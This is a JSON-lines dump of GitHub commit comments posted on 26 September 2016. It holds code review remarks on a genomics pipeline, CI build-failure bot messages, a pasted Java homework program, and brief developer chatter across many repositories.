{"id":"4619487613","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19176950,"position":74,"line":74,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:12:52Z","updated_at":"2016-09-26T18:12:52Z","body":"Given that Toil now drops you in an arbitrary directory even in single machine mode, rather than in the working directory you started from on the master, you might want to convert relative path FileIOStores to absolute paths before sending these off to the workers. I have code that helps with that in my current toillib; basically you use it as the argparse type for the field and it absolute-ifies the path when the argument is parsed."}},"created_at":"2016-09-26T18:12:52Z"}
{"id":"4619488155","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19176952,"position":null,"line":null,"path":null,"commit_id":"42a9eda99c902bc18a852da9d7c210360068e07c","created_at":"2016-09-26T18:12:58Z","updated_at":"2016-09-26T18:12:58Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-42a9eda99c902bc18a852da9d7c210360068e07c-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-42a9eda99c902bc18a852da9d7c210360068e07c-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-26T18:12:58Z"}
{"id":"4619490463","type":"CommitCommentEvent","actor":{"login":"Chasma"},"repo":{"name":"Chasma/ApProgramming"},"payload":{"comment":{"id":19176960,"position":null,"line":null,"path":null,"commit_id":"d64f78eea54a585935bd9a7f22f4f7760dfd1a6b","created_at":"2016-09-26T18:13:22Z","updated_at":"2016-09-26T18:13:22Z","body":"import TurtleGraphics.KeyboardReader;\r\n\r\n\r\npublic class packet8ex2 {\r\n\tstatic int[] numbers=new int[51];\r\n\tpublic static void main(String[] args) {\r\n\r\n\t\t// by Jan Matthew Tameta\r\n\r\n\t\tKeyboardReader reader=new KeyboardReader();\r\n\t\tint entry = 0,count=0,max=0,min=50,median = 0,total = 0;\r\n\t\tdouble average = 0;\r\n\t\tboolean init=false;\r\n\t\tdo\r\n\t\t{\r\n\t\t\tif(init)\r\n\t\t\t{\r\n\t\t\t\twhile(entry>50||entry<-1||entry==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tSystem.out.println(\"Invalid entry; must be between 1 and 50. Enter another number.\");\r\n\t\t\t\t\tentry=reader.readInt();\r\n\t\t\t\t}\r\n\t\t\t\tif(entry==-1)\r\n\t\t\t\t\tbreak;\r\n\t\t\t\telse if(entry!=-1)\r\n\t\t\t\t\tnumbers[entry]++;\r\n\r\n\t\t\t\tif(entry>max)\r\n\t\t\t\t\tmax=entry;\r\n\t\t\t\tif(entry<min)\r\n\t\t\t\t\tmin=entry;\r\n\t\t\t\ttotal=entry+total;\r\n\t\t\t\tcount++;\r\n\t\t\t}\r\n\t\t\tSystem.out.println(\"Enter a number between 1 and 50 (-1 to stop):\");\r\n\t\t\tentry=reader.readInt();\r\n\t\t\tinit=true;\r\n\t\t}\r\n\t\twhile(entry!=-1);\r\n\t\taverage=(double)total/(double)count;\r\n\t\tmedian=Median(count);\r\n\t\tSystem.out.println(\"# Count : \"+count);\r\n\t\tSystem.out.println(\"Median \\t: \"+median);\r\n\t\tSystem.out.println(\"Average : \"+average);\r\n\t\tMode();\r\n\t\tSystem.out.println(\"Maximum : \"+max);\r\n\t\tSystem.out.println(\"Minimum : \"+min);\r\n\t\tSystem.out.println(\"Range \\t: \"+(max-min));\r\n\t\tHistogram(); \r\n\t}\r\n\tprivate static int Median(int count) {\r\n\t\tint median=0;\r\n\t\tboolean even=true;\r\n\t\tif((count%2!=0))\r\n\t\teven=false;\r\n\t\tif(even==true)\r\n\t\t\tmedian = MedianOdd(count);\r\n\t\telse if(even==false)\r\n\t\t\tmedian = MedianEven(count);\r\n\t\treturn median;\r\n\t\r\n\t}\r\n\tprivate static int MedianOdd(int count) {\r\n\t\tint targetcount=(count/2)+1;\r\n\t\t\r\n\t\tfor(int x=0; x<=targetcount; x++)\r\n\t\t{\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\treturn count;\r\n\t}\r\n\tprivate static int MedianEven(int count) {\r\n\t\tint targetcount1=(count/2), targetcount2=(count/2)+1;\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\treturn count;\r\n\t}\r\n\tprivate static void Mode() \r\n\t{\r\n\r\n\t\tint mode,currentguess=0;\r\n\t\tmode=(int) Occurences();\r\n\t\tSystem.out.print(\"Mode [\"+mode+\"]:\");\r\n\t\tfor(int i=0; i<=50; i++)\r\n\t\t{\r\n\t\t\tcurrentguess=numbers[i];\r\n\t\t\tif(currentguess==mode)\r\n\t\t\t\tSystem.out.print(\" \"+i);\r\n\t\t}\r\n\t\tSystem.out.println(\" \");\r\n\t}\r\n\tprivate static int Occurences() \r\n\t{\r\n\t\tint currentguess, highest=0;\r\n\t\tfor(int i=0; i<=50; i++)\r\n\t\t{\r\n\t\t\tcurrentguess=numbers[i];\r\n\t\t\tif(currentguess>highest)\r\n\t\t\t\thighest=currentguess;\r\n\t\t}\r\n\t\treturn highest;\r\n\t}\r\n\tprivate static void Histogram() \r\n\t{\r\n\t\tint histocount=1;\r\n\t\twhile(histocount!=51)\r\n\t\t{\r\n\t\t\tSystem.out.print(histocount+\"-\"+(histocount+4)+\"\\t : \");\r\n\t\t\tPrintChar(numbers[histocount]);\r\n\t\t\tPrintChar(numbers[histocount+1]);\r\n\t\t\tPrintChar(numbers[histocount+2]);\r\n\t\t\tPrintChar(numbers[histocount+3]);\r\n\t\t\tPrintChar(numbers[histocount+4]);\r\n\t\t\tSystem.out.println(\"\");\r\n\t\t\thistocount=histocount+5;\r\n\t\t}\r\n\t}\r\n\r\n\tpublic static void PrintChar(int i)\r\n\t{\r\n\t\tfor(int x=0; x<i; x++)\r\n\t\t{\r\n\t\t\tSystem.out.print(\" ★\");\r\n\t\t}\r\n\t}\r\n}"}},"created_at":"2016-09-26T18:13:22Z"}
{"id":"4619491043","type":"CommitCommentEvent","actor":{"login":"aStonedPenguin"},"repo":{"name":"garrynewman/garrysmod"},"payload":{"comment":{"id":19176963,"position":null,"line":null,"path":null,"commit_id":"380e66153818a924d959df93e34ca412dbe62f27","created_at":"2016-09-26T18:13:28Z","updated_at":"2016-09-26T18:13:28Z","body":"Ever since I first played gmod I've thought this was intended and I'm sure others have too. Perhaps at this point it's better to keep it and call it a feature."}},"created_at":"2016-09-26T18:13:28Z"}
{"id":"4619506327","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177002,"position":431,"line":431,"path":"src/toil_scripts/dockered_chunked_call.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:16:06Z","updated_at":"2016-09-26T18:16:06Z","body":"Wait, this doesn't match the signature given above where `merge_vcf_chunks` is defined. What happened to the `job` and `options` arguments?"}},"created_at":"2016-09-26T18:16:06Z"}
{"id":"4619511239","type":"CommitCommentEvent","actor":{"login":"drewwills"},"repo":{"name":"Jasig/uPortal"},"payload":{"comment":{"id":19177009,"position":4,"line":845,"path":"uportal-war/pom.xml","commit_id":"792f21e72cf5b67f744e32f5ddf2836de60197e9","created_at":"2016-09-26T18:16:57Z","updated_at":"2016-09-26T18:16:57Z","body":"We need to talk about this."}},"created_at":"2016-09-26T18:16:57Z"}
{"id":"4619512421","type":"CommitCommentEvent","actor":{"login":"DinkyDyeAussie"},"repo":{"name":"Wargus/stratagus"},"payload":{"comment":{"id":19177012,"position":null,"line":null,"path":null,"commit_id":"8b779e6e2b3cbb090d50049314f7a18cec875f87","created_at":"2016-09-26T18:17:09Z","updated_at":"2016-09-26T18:17:09Z","body":"I was thinking about this just now. I will work on that.\r\n\r\nI guess if someone was wanting the blue background for a game a bit more sci-fi it could be toggled in a preference.\r\n\r\nThanks :)"}},"created_at":"2016-09-26T18:17:09Z"}
{"id":"4619513528","type":"CommitCommentEvent","actor":{"login":"daN4cat"},"repo":{"name":"vlahx/osposAdminLTE"},"payload":{"comment":{"id":19177015,"position":null,"line":null,"path":null,"commit_id":"8cfa7ae56cee6896907c3b12df327d9abed58f7e","created_at":"2016-09-26T18:17:20Z","updated_at":"2016-09-26T18:17:20Z","body":"Hi there, just to let you know that this repo is old and really out of sync vs OSPOS standard distro.\r\nI would start from here first: https://github.com/jekkos/opensourcepos or even way for the composer branch to be merged."}},"created_at":"2016-09-26T18:17:20Z"}
{"id":"4619515586","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177024,"position":20,"line":20,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:17:42Z","updated_at":"2016-09-26T18:17:42Z","body":"Is this the right place for this information? Is this what people need to know when they first arrive at this file?"}},"created_at":"2016-09-26T18:17:42Z"}
{"id":"4619521328","type":"CommitCommentEvent","actor":{"login":"DeepDiver1975"},"repo":{"name":"Kawohl/c-"},"payload":{"comment":{"id":19177037,"position":9,"line":14,"path":"Arrays/Arrays/Arrays.cpp","commit_id":"2282e512ba17e7c3fd997886d1fb86c52b0d3cb6","created_at":"2016-09-26T18:18:44Z","updated_at":"2016-09-26T18:18:44Z","body":"Nachdem du hier da c++ schreibst, musst du die variablen nicht vorab deklarieren "}},"created_at":"2016-09-26T18:18:44Z"}
{"id":"4619521361","type":"CommitCommentEvent","actor":{"login":"Oberon00"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":19177038,"position":33,"line":33,"path":"runtime/doc/deprecated.txt","commit_id":"e65895941ca262e1ca708b19ea18d72a77761279","created_at":"2016-09-26T18:18:44Z","updated_at":"2016-09-26T18:18:44Z","body":"This does not sound right. :)"}},"created_at":"2016-09-26T18:18:44Z"}
{"id":"4619521682","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177039,"position":148,"line":148,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:18:48Z","updated_at":"2016-09-26T18:18:48Z","body":"Can code like this be deduplicated between the docker and non-docker versions of the pipeline?"}},"created_at":"2016-09-26T18:18:48Z"}
{"id":"4619522692","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19177043,"position":62,"line":62,"path":"js/src/alignArrays.js","commit_id":"4d26d9188148eafe32f461e36f7e64b01be28e27","created_at":"2016-09-26T18:18:58Z","updated_at":"2016-09-26T18:18:58Z","body":"Why is `[ai]` (and `[bi]` below) wrapped in an array here? `splice` takes an index as its first argument."}},"created_at":"2016-09-26T18:18:58Z"}
{"id":"4619523027","type":"CommitCommentEvent","actor":{"login":"mhavard999"},"repo":{"name":"mhavard999/BroPuns"},"payload":{"comment":{"id":19177045,"position":null,"line":null,"path":null,"commit_id":"d9202520d2bea77c003b3c449ed84f8a7990d3d5","created_at":"2016-09-26T18:19:01Z","updated_at":"2016-09-26T18:19:01Z","body":"WATCH IT BUDDEH"}},"created_at":"2016-09-26T18:19:01Z"}
{"id":"4619523989","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"joakimk/toniq"},"payload":{"comment":{"id":19177049,"position":8,"line":21,"path":"lib/toniq.ex","commit_id":"bd1000b5d91375eaf7683da4505236809f90c787","created_at":"2016-09-26T18:19:12Z","updated_at":"2016-09-26T18:19:12Z","body":"If this is ever done in master, try to ensure it runs the jobs in about the same order as before. The storage may have to change to use [sorted sets](http://redis.io/topics/data-types#sorted-sets)."}},"created_at":"2016-09-26T18:19:12Z"}
{"id":"4619524472","type":"CommitCommentEvent","actor":{"login":"mhavard999"},"repo":{"name":"mhavard999/BroPuns"},"payload":{"comment":{"id":19177061,"position":null,"line":null,"path":null,"commit_id":"d9202520d2bea77c003b3c449ed84f8a7990d3d5","created_at":"2016-09-26T18:19:17Z","updated_at":"2016-09-26T18:19:17Z","body":"👍 🎉 🎋 "}},"created_at":"2016-09-26T18:19:17Z"}
{"id":"4619527533","type":"CommitCommentEvent","actor":{"login":"DinkyDyeAussie"},"repo":{"name":"Wargus/stratagus"},"payload":{"comment":{"id":19177069,"position":null,"line":null,"path":null,"commit_id":"8b779e6e2b3cbb090d50049314f7a18cec875f87","created_at":"2016-09-26T18:19:50Z","updated_at":"2016-09-26T18:19:50Z","body":"Btw that wargus in-game preferences dialog is pretty full already haha. Maybe I'll option it on the main options screen when you first start wargus. "}},"created_at":"2016-09-26T18:19:50Z"}
{"id":"4619529158","type":"CommitCommentEvent","actor":{"login":"ktsaou"},"repo":{"name":"firehol/netdata"},"payload":{"comment":{"id":19177072,"position":null,"line":null,"path":null,"commit_id":"8b136be32afcc7ddeb66b19e7e786e832f64a785","created_at":"2016-09-26T18:20:05Z","updated_at":"2016-09-26T18:20:05Z","body":"why don't you do it then? :)\r\n\r\ngithub had cached the badges (by fault, netdata was serving them with wrong expiration), so I had to update README.md asap to change their URLs to be uncached (notice the v41 to v42 change at the URLs)."}},"created_at":"2016-09-26T18:20:05Z"}
{"id":"4619538479","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19177090,"position":65,"line":65,"path":"js/src/alignArrays.js","commit_id":"4d26d9188148eafe32f461e36f7e64b01be28e27","created_at":"2016-09-26T18:21:44Z","updated_at":"2016-09-26T18:21:44Z","body":"I wonder if, instead of splicing into the `a` and `b` arrays every time, this would be more efficient to build up an array of consecutive things to splice into all at once.\r\n\r\nWe don't have to try this out now."}},"created_at":"2016-09-26T18:21:44Z"}
{"id":"4619539694","type":"CommitCommentEvent","actor":{"login":"ikarus23"},"repo":{"name":"Proxmark/proxmark3"},"payload":{"comment":{"id":19177096,"position":null,"line":null,"path":null,"commit_id":"fd4f21b766a715303f0b1436c9970f5965e644dc","created_at":"2016-09-26T18:21:58Z","updated_at":"2016-09-26T18:21:58Z","body":"Hmpf. Revert?"}},"created_at":"2016-09-26T18:21:58Z"}
{"id":"4619540148","type":"CommitCommentEvent","actor":{"login":"agarwal"},"repo":{"name":"biocaml/biocaml"},"payload":{"comment":{"id":19177098,"position":null,"line":null,"path":null,"commit_id":"ca7cb5807527e80a59e689cd5d417023f19bd9c1","created_at":"2016-09-26T18:22:02Z","updated_at":"2016-09-26T18:22:02Z","body":"Now tracking this issue at solvuu/solvuu-build#37."}},"created_at":"2016-09-26T18:22:02Z"}
{"id":"4619543638","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19177102,"position":null,"line":null,"path":null,"commit_id":"5828a74a313379f129440f08945f3cb9498c864f","created_at":"2016-09-26T18:22:37Z","updated_at":"2016-09-26T18:22:37Z","body":"@qurben Je bent lekker aan het patchen op master, maar omdat het gaat om het login-systeem zie ik graag wat documentatie over het hoe en waarom."}},"created_at":"2016-09-26T18:22:37Z"}
{"id":"4619544494","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177108,"position":306,"line":306,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:22:46Z","updated_at":"2016-09-26T18:22:46Z","body":"I never liked this random sleep here, because it should never have been necessary according to how the filesystem is supposed to work. Is it still necessary? Or does docker_call guarantee that all writes from the container are going to be visible for us to read? I suspect it does (or at least that it is supposed to)."}},"created_at":"2016-09-26T18:22:46Z"}
{"id":"4619547688","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19177116,"position":null,"line":null,"path":null,"commit_id":"c5e240df55a592f78f54410765af1a5722d5c19d","created_at":"2016-09-26T18:23:18Z","updated_at":"2016-09-26T18:23:18Z","body":"@qurben Is het uit-commenten tijdelijk?"}},"created_at":"2016-09-26T18:23:18Z"}
{"id":"4619548637","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177118,"position":330,"line":330,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:23:27Z","updated_at":"2016-09-26T18:23:27Z","body":"Do we still need to work around this bug? Maybe doubling steps should be a user option now?"}},"created_at":"2016-09-26T18:23:27Z"}
{"id":"4619551304","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"cai799174/OpenStudio"},"payload":{"comment":{"id":19177123,"position":null,"line":null,"path":null,"commit_id":"b29604235bbc78a243fbabcdf30d073a64bf1262","created_at":"2016-09-26T18:23:57Z","updated_at":"2016-09-26T18:23:57Z","body":"1973-AddDualDuctTerminals (cai799174) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b29604235bbc78a243fbabcdf30d073a64bf1262-PR2358-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b29604235bbc78a243fbabcdf30d073a64bf1262-PR2358-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-19.66%25-red.svg)</a> \n"}},"created_at":"2016-09-26T18:23:57Z"}
{"id":"4619553261","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19177129,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-26T18:24:18Z","updated_at":"2016-09-26T18:24:18Z","body":"Hi, Thanks :)\r\nAre you ready to port more than 3000 commits? :)\r\nI have updated my-MM-v10c branch to caf LA.HB.1.1.2-43000-8x96.0.\r\nIt contains also your fix regarding modem, audio and vidc drivers!"}},"created_at":"2016-09-26T18:24:18Z"}
{"id":"4619560590","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177184,"position":418,"line":418,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:25:34Z","updated_at":"2016-09-26T18:25:34Z","body":"Where did 12 gigs of RAM exactly come from?"}},"created_at":"2016-09-26T18:25:34Z"}
{"id":"4619560715","type":"CommitCommentEvent","actor":{"login":"tdas"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19177185,"position":157,"line":261,"path":"external/kafka-0-10-sql/src/main/scala/org/apache/spark/sql/kafka010/KafkaSourceProvider.scala","commit_id":"e1671525d142b249749fcd58d5d3bc325fc46c71","created_at":"2016-09-26T18:25:35Z","updated_at":"2016-09-26T18:25:35Z","body":"Suggestions welcome! The intention is to separate from the auto.offset.reset because we are changing the default semantics a little bit by starting from newly discovered partitions from the earliest. "}},"created_at":"2016-09-26T18:25:35Z"}
{"id":"4619564738","type":"CommitCommentEvent","actor":{"login":"SpaceK33z"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19177200,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-26T18:26:18Z","updated_at":"2016-09-26T18:26:18Z","body":"@toxicFork, fyi, `1.8.3` was just released with the fix."}},"created_at":"2016-09-26T18:26:18Z"}
{"id":"4619565247","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19177203,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-26T18:26:24Z","updated_at":"2016-09-26T18:26:24Z","body":"hi when personal raid dragon found, bot just stop there. Already turn off pause on dragon found. "}},"created_at":"2016-09-26T18:26:24Z"}
{"id":"4619569450","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177220,"position":436,"line":436,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:27:10Z","updated_at":"2016-09-26T18:27:10Z","body":"With the new Toil caching, we should really keep the index in the Toil file store (perhaps in addition to the IOStore?) so it can be cached and shared between multiple jobs on the same machine. We might also want to not just tar it all up but to do all the individual files (otherwise we'll be untarring the index for every chunk)."}},"created_at":"2016-09-26T18:27:10Z"}
{"id":"4619571856","type":"CommitCommentEvent","actor":{"login":"ron666"},"repo":{"name":"SoftCreatR/mediaelement"},"payload":{"comment":{"id":19177227,"position":null,"line":null,"path":null,"commit_id":"d55d7b908c01b191527b5e987c6ff581aee4bb2b","created_at":"2016-09-26T18:27:36Z","updated_at":"2016-09-26T18:27:36Z","body":"The prefix for the translation should be de not en"}},"created_at":"2016-09-26T18:27:36Z"}
{"id":"4619571918","type":"CommitCommentEvent","actor":{"login":"jotak"},"repo":{"name":"hawkular/hawkular-metrics"},"payload":{"comment":{"id":19177228,"position":5,"line":186,"path":"job-scheduler/src/main/java/org/hawkular/metrics/scheduler/impl/SchedulerImpl.java","commit_id":"f4e91789a6250b0f3e2a2641c31b63a54d4b9646","created_at":"2016-09-26T18:27:37Z","updated_at":"2016-09-26T18:27:37Z","body":"you probably meant Math.max"}},"created_at":"2016-09-26T18:27:37Z"}
{"id":"4619575532","type":"CommitCommentEvent","actor":{"login":"ron666"},"repo":{"name":"SoftCreatR/mediaelement"},"payload":{"comment":{"id":19177239,"position":null,"line":null,"path":null,"commit_id":"5bf7409ea32a3cf8e2b3f622f9752e5142474bab","created_at":"2016-09-26T18:28:16Z","updated_at":"2016-09-26T18:28:16Z","body":"Sorry I just saw the fix"}},"created_at":"2016-09-26T18:28:16Z"}
{"id":"4619576475","type":"CommitCommentEvent","actor":{"login":"kannanmcatce"},"repo":{"name":"kannanmcatce/FirstProject"},"payload":{"comment":{"id":19177245,"position":null,"line":null,"path":null,"commit_id":"298bbf3252a84e1ec67cbd02428f43cd9fef2c38","created_at":"2016-09-26T18:28:27Z","updated_at":"2016-09-26T18:28:27Z","body":"Hi Ram,\r\n            Please find below list of active items I have completed for last six months.\r\n\r\n\tHave done service work for around 15 defects on multiple services. Such as Downstream Data power ,ULPRS Service , ULPRS Data Power, Policy Service ,Policy Data Power and Auto cancel... \r\n\tHave successfully completed around 5 SPIDs without any Defects. Which consist of “KY Tax calculation” , “Dwelling count calculation” and Pipeline Tax code  changes\r\n\tHave contributed towards Regression testing Issues and Test Case Executions. For Individual Maximum capacity utilization we have executed Test Cass for few of the Defects.\r\n\tContributing the Regression Test Execution Scripts modification along with one of the SMEs.\r\n\tHave prepared training materials for “Git & GitHub – a web-based repository hosting service” which is to be shared with Cognizant learning Assistance team.\r\n\tSuccessfully completed my Quarterly RDB courses.\r\n\r\nPlease let me know if you need any other info.\r\n"}},"created_at":"2016-09-26T18:28:27Z"}
{"id":"4619577250","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19177255,"position":null,"line":null,"path":null,"commit_id":"2860c1d06a470a3604c0d3c5a4a369c4b95719e5","created_at":"2016-09-26T18:28:35Z","updated_at":"2016-09-26T18:28:35Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/2860c1d06a470a3604c0d3c5a4a369c4b95719e5/source/docs/assets/js/main.js)\n"}},"created_at":"2016-09-26T18:28:35Z"}
{"id":"4619578347","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177259,"position":508,"line":508,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:28:47Z","updated_at":"2016-09-26T18:28:47Z","body":"I think this is unused; we don't need the graph to merge the GAMs, do we?"}},"created_at":"2016-09-26T18:28:47Z"}
{"id":"4619580086","type":"CommitCommentEvent","actor":{"login":"Undergarun"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19177261,"position":null,"line":null,"path":null,"commit_id":"4b990eb7d7fda3951e640d84a5c18c90366cd26b","created_at":"2016-09-26T18:29:07Z","updated_at":"2016-09-26T18:29:07Z","body":"Non precompiled headers compile broken at least under GCC."}},"created_at":"2016-09-26T18:29:07Z"}
{"id":"4619584062","type":"CommitCommentEvent","actor":{"login":"iceman1001"},"repo":{"name":"Proxmark/proxmark3"},"payload":{"comment":{"id":19177289,"position":null,"line":null,"path":null,"commit_id":"fd4f21b766a715303f0b1436c9970f5965e644dc","created_at":"2016-09-26T18:29:48Z","updated_at":"2016-09-26T18:29:48Z","body":"you better ;)"}},"created_at":"2016-09-26T18:29:48Z"}
{"id":"4619585451","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":19177297,"position":null,"line":null,"path":null,"commit_id":"0d78c267e994c44bd0f31735bb61e8a49ff439c9","created_at":"2016-09-26T18:30:03Z","updated_at":"2016-09-26T18:30:03Z","body":"What happened?"}},"created_at":"2016-09-26T18:30:03Z"}
{"id":"4619586201","type":"CommitCommentEvent","actor":{"login":"mukkachaitanya"},"repo":{"name":"OSDLabs/WavesWebsite2016"},"payload":{"comment":{"id":19177299,"position":13,"line":149,"path":"waves/settings/local.py","commit_id":"834b267fb8a0c0af7921e15f67a8fe1bc0a4811c","created_at":"2016-09-26T18:30:11Z","updated_at":"2016-09-26T18:30:11Z","body":"??? "}},"created_at":"2016-09-26T18:30:11Z"}
{"id":"4619586255","type":"CommitCommentEvent","actor":{"login":"mukkachaitanya"},"repo":{"name":"OSDLabs/WavesWebsite2016"},"payload":{"comment":{"id":19177300,"position":null,"line":null,"path":null,"commit_id":"834b267fb8a0c0af7921e15f67a8fe1bc0a4811c","created_at":"2016-09-26T18:30:11Z","updated_at":"2016-09-26T18:30:11Z","body":"I had done the same thing by myself but couldn't update so :P \r\n"}},"created_at":"2016-09-26T18:30:11Z"}
{"id":"4619587442","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177309,"position":517,"line":517,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:30:23Z","updated_at":"2016-09-26T18:30:23Z","body":"If we're just going to make these files and turn around and merge them, we might save some copies caching them in the Toil cache. But the we wouldn't be able to properly resume a failed run, since Azure doesn't have working job store load..."}},"created_at":"2016-09-26T18:30:23Z"}
{"id":"4619590635","type":"CommitCommentEvent","actor":{"login":"Bekkalizer"},"repo":{"name":"dhis2/dhis2-core"},"payload":{"comment":{"id":19177318,"position":null,"line":null,"path":null,"commit_id":"1953fd5641f7911cf7ea724ff971660bc892fd5a","created_at":"2016-09-26T18:30:55Z","updated_at":"2016-09-26T18:30:55Z","body":"Documentation: [https://github.com/Bekkalizer/dhis2-docs/commit/c88d4719faa9e41594846eba8608ec3e8f84f2a2](url)"}},"created_at":"2016-09-26T18:30:55Z"}
{"id":"4619592164","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177325,"position":523,"line":523,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:31:12Z","updated_at":"2016-09-26T18:31:12Z","body":"Since this is binary data, does it make sense to buffer it by line? Or would a fixed-size buffer be more appropriate?"}},"created_at":"2016-09-26T18:31:12Z"}
{"id":"4619595345","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19177335,"position":523,"line":523,"path":"src/toil_scripts/vg_evaluation_pipeline/vg_evaluation_pipeline.py","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-26T18:31:44Z","updated_at":"2016-09-26T18:31:44Z","body":"Or maybe there's something useful in `shutil` that will do the job?"}},"created_at":"2016-09-26T18:31:44Z"}
